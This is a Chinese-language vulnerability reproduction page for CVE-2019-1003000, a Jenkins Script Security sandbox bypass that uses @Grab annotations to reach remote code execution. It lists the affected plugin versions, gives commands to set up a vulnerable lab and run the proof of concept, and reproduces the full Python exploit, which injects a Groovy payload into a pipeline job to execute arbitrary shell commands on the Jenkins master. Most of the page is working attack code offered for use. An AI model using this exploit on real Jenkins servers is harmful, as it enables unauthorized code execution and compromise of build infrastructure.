# CVE-2019-1003000 Jenkins 远程代码执行漏洞
### 一、漏洞简介
该漏洞存在于Declarative Plugin 1.3.4.1之前的版本, Groovy Plugin 2.61.1之前的版本以及 Script Security Plugin 1.50之前的版本。该漏洞通过将AST转换注释(如@Grab)应用于源代码元素,可以在脚本编译阶段避免脚本安全沙箱保护。所以会造成具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed Pipeline共享库内容的用户可以绕过沙盒保护并在Jenkins主服务器上执行任意代码。
### 二、漏洞影响
Declarative Plugin < 1.3.4.1 Groovy Plugin < 2.61.1 Script Security Plugin < 1.50 ### 三、复现过程 环境搭建 ```bash gitclone https://github.com/ianxtianxt/cve-2019-1003000-jenkins-rce-poc.git cdcve-2019-1003000-jenkins-rce-poc pipinstall -r requirements.txt cdsample-vuln ./run.sh ``` 输入账号密码user1:user1  poc进行攻击 ``` pythonexploit.py –url http://url:8080 –job my-pipeline –usernameuser1 –password user1 –cmd “whoami” ```   **poc** ```python #!/usr/bin/python # Author: Adam Jordan # Date: 2019-02-15 # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) import argparse import jenkins import time from xml.etree import ElementTree payload = ''' import org.buildobjects.process.ProcBuilder @Grab('org.buildobjects:jproc:2.2.3') class Dummy{ } print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString() ''' def run_command(url, cmd, job_name, username, password): print '[+] connecting to jenkins...' server = jenkins.Jenkins(url, username, password) print '[+] crafting payload...' ori_job_config = server.get_job_config(job_name) et = ElementTree.fromstring(ori_job_config) et.find('definition/script').text = payload % cmd job_config = ElementTree.tostring(et, encoding='utf8', method='xml') print '[+] modifying job with payload...' server.reconfig_job(job_name, job_config) time.sleep(3) print '[+] putting job build to queue...' queue_number = server.build_job(job_name) time.sleep(3) print '[+] waiting for job to build...' queue_item_info = {} while 'executable' not in queue_item_info: queue_item_info = server.get_queue_item(queue_number) time.sleep(1) print '[+] restoring job...' server.reconfig_job(job_name, ori_job_config) time.sleep(3) print '[+] fetching output...' last_build_number = server.get_job_info(job_name)['lastBuild']['number'] console_output = server.get_build_console_output(job_name, last_build_number) print '[+] OUTPUT:' print console_output if __name__ == '__main__': parser = argparse.ArgumentParser(description='Jenkins RCE') parser.add_argument('--url', help='target jenkins url') parser.add_argument('--cmd', help='system command to be run') parser.add_argument('--job', help='job name') parser.add_argument('--username', help='username') parser.add_argument('--password', help='password') args = parser.parse_args() run_command(args.url, args.cmd, args.job, args.username, args.password) ``` 参考链接 https://www.freebuf.com/column/197026.html
请登录后查看评论内容